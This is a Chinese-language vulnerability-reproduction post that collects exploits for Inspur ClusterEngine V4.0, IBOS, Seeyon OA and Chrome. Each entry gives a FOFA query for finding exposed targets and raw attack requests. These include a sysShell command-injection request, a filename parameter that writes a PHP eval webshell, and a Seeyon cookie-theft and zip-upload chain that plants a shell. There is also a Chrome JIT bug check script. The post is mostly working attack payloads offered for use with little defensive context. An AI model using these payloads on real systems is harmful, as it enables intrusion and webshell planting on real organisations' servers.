漏洞复现~~

“突然发现，原来不少要好的朋友，已经在不知不觉中失去联系。原来，友情也像杯子一样，需要踫一踫才不会孤单的”

导读

最近不是应急就是日站，人都憔悴了许多。想找志同道合的朋友一起维护公众号，有想法联系作者。复现过程略显简单，有需要作者复现文档的直接去公众号回复“复现”即可。

复现索引

浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞

1）FOFA语句

1）title="TSCEV4.0"

2）界面如下

3）利用POC

POST /sysShell HTTP/1.1Host: xxx.xxx.xxx.xxxAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: lang=cnCache-Control: max-age=0Content-Length: 42op=doPlease&node=cu01&command=whoami

IBOS 数据库模块任意文件上传漏洞

1）FOFA语句

body="IBOS" && body="login"-pannel

2）登录界面如下（http://xxx.xxx.xxx.xxx/?r=dashboard/default/login）

3）找到数据库备份模块

4）提交并抓包

5）修改filename参数发送包会上传php文件到根目录

backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=MoBei%26echo "<?php eval($_REQUEST[MoBei]);?>">MoBei%PATHEXT:~0,1%php%26MoBei&dbSubmit=1

PS:没来得急复现~~~

致远OA Session泄露任意文件上传漏洞

1）FOFA语句

title=”致远”

2）登录界面

3）获取管理员cookin,返回包出现 Sset-Cookie 和 a8genius.do 即为成功获取

POST /seeyon/thirdpartyController.do HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 133Content-Type: application/x-www-form-urlencodedmethod=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

4)上传压缩包添加 Cookie上传

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1Host: xxx.xxx.xxx.xxxConnection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.25.1Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5Content-Length: 841Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="firstSave"true--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="callMethod"resizeLayout--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="isEncrypt"0--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="takeOver"false--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="type"0--59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="file1"; filename="MoBei.png"Content-Type: image/pngPK....................______--59229605f98b8cf290a7b8908b34616b--

5）然后构造请求解压压缩包，状态码返回500即为上传成功（其中含有zip压缩包 shell.zip, 如果上传失败更改一下文件名)

POST /seeyon/ajax.do HTTP/1.1Host: 192.168.10.2User-Agent: python-requests/2.25.1Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedCookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913Content-Length: 157method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D

Windows Chrom 远程命令执行漏洞（0day）

1）漏洞检测POC，如出现不一致，则代表存在漏洞。

<html>    <script>        function log(str){            document.write("<p>" + str + "</p>");        }        print = console.log;        const arr = new Uint32Array([2**31]);        function foo() {            return (arr[0] ^ 0) + 1;        }        log(foo());//-2147483647        for(let i=0;i<10000;i++){            print(foo());        }        log(foo());//2147483649</script></html>